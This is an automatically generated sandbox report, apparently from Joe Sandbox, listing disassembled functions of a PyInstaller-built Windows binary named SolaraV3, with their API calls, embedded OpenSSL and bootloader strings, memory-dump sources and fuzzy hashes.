Instruction ID: f4adc7efcbf92c2efcfbd135f9b0ccb1762818622b6cbbf5b503a55482c01894
Opcode Fuzzy Hash: b9812aa4a412ff6f242132f81c88a7c8c76a4ef9029947ab8fd2a45bc25d6007
Instruction Fuzzy Hash: 44418F62A1968A81EA309B13E5002BE73A4FB85BC4F444136DF9D97799DE3EE523D700

Function 00007FF6DC7090E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6DC708570: GetCurrentProcess.KERNEL32 ref: 00007FF6DC708590
Part of subcall function 00007FF6DC708570: OpenProcessToken.ADVAPI32 ref: 00007FF6DC7085A3
Part of subcall function 00007FF6DC708570: GetTokenInformation.ADVAPI32 ref: 00007FF6DC7085C8
Part of subcall function 00007FF6DC708570: GetLastError.KERNEL32 ref: 00007FF6DC7085D2
Part of subcall function 00007FF6DC708570: GetTokenInformation.ADVAPI32 ref: 00007FF6DC708612
Part of subcall function 00007FF6DC708570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6DC70862E
Part of subcall function 00007FF6DC708570: CloseHandle.KERNEL32 ref: 00007FF6DC708646

LocalFree.KERNEL32(?,00007FF6DC703C55), ref: 00007FF6DC70916C
LocalFree.KERNEL32(?,00007FF6DC703C55), ref: 00007FF6DC709175

Strings

D:(A;;FA;;;%s), xrefs: 00007FF6DC709157
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6DC709183
S-1-3-4, xrefs: 00007FF6DC709121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6DC709142

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction ID: a149f3f94df4df9367260d828c308a77d8474707443fd911e8975ba06f9d8111
Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction Fuzzy Hash: C0214D21A0864A81E610AB11E4252EE6361FF88780F544037EA4D83BD6DF3DD966D740

Function 00007FF6DC71B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B2D7
FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B30D
FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B33A
FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B34B
FlsSetValue.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B35C
SetLastError.KERNEL32(?,?,?,00007FF6DC714F11,?,?,?,?,00007FF6DC71A48A,?,?,?,?,00007FF6DC71718F), ref: 00007FF6DC71B377

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
Instruction ID: 3ba90b57abc033802a6f73968ec955b1af2912bec75d2ea29a7ab1daa42ad204
Opcode Fuzzy Hash: 511c86220214880ca4b01c77dd55d0a7de68e458561f726588d357ec3f22002e
Instruction Fuzzy Hash: 14116030F0C68A86FA585729566113D62429F447F0F146736E83EC76D6DE2CA4738300

Function 00007FFB0C36A470 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 181COMMON

Download Yara Rule

APIs

00007FFB2ADA3440.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFB0C36A656
GetLastError.KERNEL32 ref: 00007FFB0C36A665

Strings

..\s\ssl\ssl_cert.c, xrefs: 00007FFB0C36A67B, 00007FFB0C36A6B2, 00007FFB0C36A6E0, 00007FFB0C36A721
OPENSSL_DIR_read(&ctx, ', xrefs: 00007FFB0C36A694
%s/%s, xrefs: 00007FFB0C36A528

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: 00007A3440ErrorLast
String ID: %s/%s$..\s\ssl\ssl_cert.c$OPENSSL_DIR_read(&ctx, '
API String ID: 848807496-4291904164
Opcode ID: 43a2a23570172f1492d2df20069b1eec957ebead7fe1968015ea09c30e310cbe
Instruction ID: 9ebb58185fb1ef5984ec9fb19be192658061b30feb45db2c24cfae61b01d3152
Opcode Fuzzy Hash: 43a2a23570172f1492d2df20069b1eec957ebead7fe1968015ea09c30e310cbe
Instruction Fuzzy Hash: D17194E1A2C68686FA20AB75D459FFE63A0AF85784F444031EB4E17B96DF3CE4419704

Function 00007FFB0B811D4D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 99libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00007FFB0BA560CB
GetModuleHandleA.KERNEL32 ref: 00007FFB0BA560DD
GetModuleHandleW.KERNEL32 ref: 00007FFB0BA560EA
GetProcAddress.KERNEL32 ref: 00007FFB0BA56152

Strings

OPENSSL_Uplink(%p,%02X): , xrefs: 00007FFB0BA56062

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: OPENSSL_Uplink(%p,%02X):
API String ID: 1883125708-1089269818
Opcode ID: 4ccc3ce23c4402700d34cdd1b44a20b3c7d878ed7d0ac8f9f23aaafae92de14e
Instruction ID: f4bc345b675a8e63b2d0711bd3261ba5d6eb77a168ea5c2db84aa96146a2a98e
Opcode Fuzzy Hash: 4ccc3ce23c4402700d34cdd1b44a20b3c7d878ed7d0ac8f9f23aaafae92de14e
Instruction Fuzzy Hash: 8351FCA5D08B4286E6158F38E800A7533A0FF59B64B44D736D96F822B6EF3CB695C700

Function 00007FF6DC702910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6DC701B6A), ref: 00007FF6DC70295E

Strings

%s: %s, xrefs: 00007FF6DC7029E8
Error, xrefs: 00007FF6DC702A0E
[PYI-%d:ERROR] , xrefs: 00007FF6DC702966
Error [ANSI Fallback], xrefs: 00007FF6DC7029FF

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: 52007a145e6001d1a4f92277134af69f6b3d16f96283a07eddd00bc2d0bec1bb
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: 0D31F623B18A8956E7209766A8512EF66A4BF887D4F400133FE8DD3789EF3CD1578700

Function 00007FF6DC702390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6DC7023C8
DialogBoxIndirectParamW.USER32 ref: 00007FF6DC70248E
DeleteObject.GDI32 ref: 00007FF6DC7024C1
DestroyIcon.USER32 ref: 00007FF6DC7024D3

Strings

Unhandled exception in script, xrefs: 00007FF6DC7023F8

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
Instruction ID: f87a8971a6a07dffa7b8405072eba2ab3beb5a87b21ef52bd23ffd51ff5ec390
Opcode Fuzzy Hash: 3b326f38696452fedce944a8216705a7f012b21920c96e855d1ab8eaac442c5d
Instruction Fuzzy Hash: A1317372A19A8689EB20DF25E8652FD6360FF88784F540136EA4E87B99DF3CD116C700

Function 00007FF6DC702B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF6DC70918F,?,00007FF6DC703C55), ref: 00007FF6DC702BA0
MessageBoxW.USER32 ref: 00007FF6DC702C2A

Strings

Warning, xrefs: 00007FF6DC702C1D
[PYI-%d:%ls] , xrefs: 00007FF6DC702BA8
WARNING, xrefs: 00007FF6DC702BAF

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: 4d3c1e3fea9780c66f6163453185013722541ed139eca782b23bf3d1631b11b3
Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction Fuzzy Hash: FF21DE62708B8582E7219B15F8907EE63A4FB88784F400136EA8D93659DE3CE266C740

Function 00007FF6DC702710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF6DC701B99), ref: 00007FF6DC702760

Strings

Error, xrefs: 00007FF6DC7027DE
Error [ANSI Fallback], xrefs: 00007FF6DC7027CF
[PYI-%d:%s] , xrefs: 00007FF6DC702768
ERROR, xrefs: 00007FF6DC70276F

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction ID: 3d73c88f342bad0709f15477228df80d71bb404cafae940d004e271bdf60c224
Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
Instruction Fuzzy Hash: 52219272A18B8946E720DB55F8517EAA3A4FB88384F400136FE8D93659DF7CD15A8740

Function 00007FF6DC719A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6DC719AAD
GetProcAddress.KERNEL32 ref: 00007FF6DC719AC3
FreeLibrary.KERNEL32 ref: 00007FF6DC719AEA

Strings

mscoree.dll, xrefs: 00007FF6DC719AA4
CorExitProcess, xrefs: 00007FF6DC719ABC

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction ID: 60ba1b9f53e9d0e0ca73b16e237b5a41758d923d8acb65d232e4b7e1a499a37d
Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
Instruction Fuzzy Hash: 58F06221B0970A81EA209B24E4A437EA360FF497A1F541237D67E865E4DF2CE05BC340

Function 00007FF6DC729368 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6DC729390
_set_statfp.LIBCMT ref: 00007FF6DC7293AB
_set_statfp.LIBCMT ref: 00007FF6DC7293C7
_set_statfp.LIBCMT ref: 00007FF6DC729403

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: d7fcc1fdc0fdb477ba1f4b37f16fb16faab36ff8ad3d1c3f55781e2e7658b93e
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 17115432E5CA0B01FA781165E4B537D9150AF59374E0C4637FA6ED62D7DE6C69638100

Function 00007FF6DC71B390 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B3AF
FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B3CE
FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B3F6
FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B407
FlsSetValue.KERNEL32(?,?,?,00007FF6DC71A5A3,?,?,00000000,00007FF6DC71A83E,?,?,?,?,?,00007FF6DC71A7CA), ref: 00007FF6DC71B418

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
Instruction ID: 51120308e5bf071dd94d868f5809307f97b34f3bc09d3dc409e30dfe0c420366
Opcode Fuzzy Hash: 6f944022d23edc1c4acf36ee41aa723466f994e0e1af3fb98e05b0010e79b0d5
Instruction Fuzzy Hash: 90111F70F0864A81FA58972A956117D62519F447F0F58A336E93DC66D6DE2CA4638201

Function 00007FF6DC71B224 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6DC71B235
FlsSetValue.KERNEL32 ref: 00007FF6DC71B254
FlsSetValue.KERNEL32 ref: 00007FF6DC71B27C
FlsSetValue.KERNEL32 ref: 00007FF6DC71B28D
FlsSetValue.KERNEL32 ref: 00007FF6DC71B29E

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
Instruction ID: 3f78b665e5481f3394af489ebaf854d9d232443db26f784891be9587faa9d7f3
Opcode Fuzzy Hash: cf61fb6c00b1796c5bed08ecf7b6551a73a14dc995a044f45feadad5ae41d3ad
Instruction Fuzzy Hash: 03110960F0C60F85F9686279457217E12824F4A770F18A736E93ECA6D2DD2CB4679311

Function 00007FFB0C3521C1 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 355COMMON

Download Yara Rule

APIs

00007FFB2ADB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFB0C39E894

Strings

&, xrefs: 00007FFB0C39EBCA
..\s\ssl\statem\statem_clnt.c, xrefs: 00007FFB0C39E89A, 00007FFB0C39EBD6
resumption, xrefs: 00007FFB0C39EB49

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: 00007
String ID: &$..\s\ssl\statem\statem_clnt.c$resumption
API String ID: 3568877910-1441847574
Opcode ID: a7d4c1d8856ac1d26af83218d8943a4bdd86404aee8b91189861af3a8a8d4159
Instruction ID: 1ad43dc7735d653f941148aac2fedbddcee8094a0beac87a8849442ea40800e5
Opcode Fuzzy Hash: a7d4c1d8856ac1d26af83218d8943a4bdd86404aee8b91189861af3a8a8d4159
Instruction Fuzzy Hash: 5CF18DF261CA8185E720CB29E488FADB7A1FB85B84F048135DA8D87795DF7DE591C700

Function 00007FFB0C384EF0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 268COMMON

Download Yara Rule

APIs

00007FFB2ADB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFB0C384F7E

Strings

..\s\ssl\ssl_sess.c, xrefs: 00007FFB0C384F16
T, xrefs: 00007FFB0C384F9E
, xrefs: 00007FFB0C3850D7

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: 00007
String ID: $..\s\ssl\ssl_sess.c$T
API String ID: 3568877910-2024727245
Opcode ID: bae10787738cc56e37b62d3b1ee36bf99efdbc286f7b95d1d095db50d282c8fb
Instruction ID: c70b3012f65f5c53e76c33fe3f9b8233d6b4623b385fcaf12f5a4b410792cd09
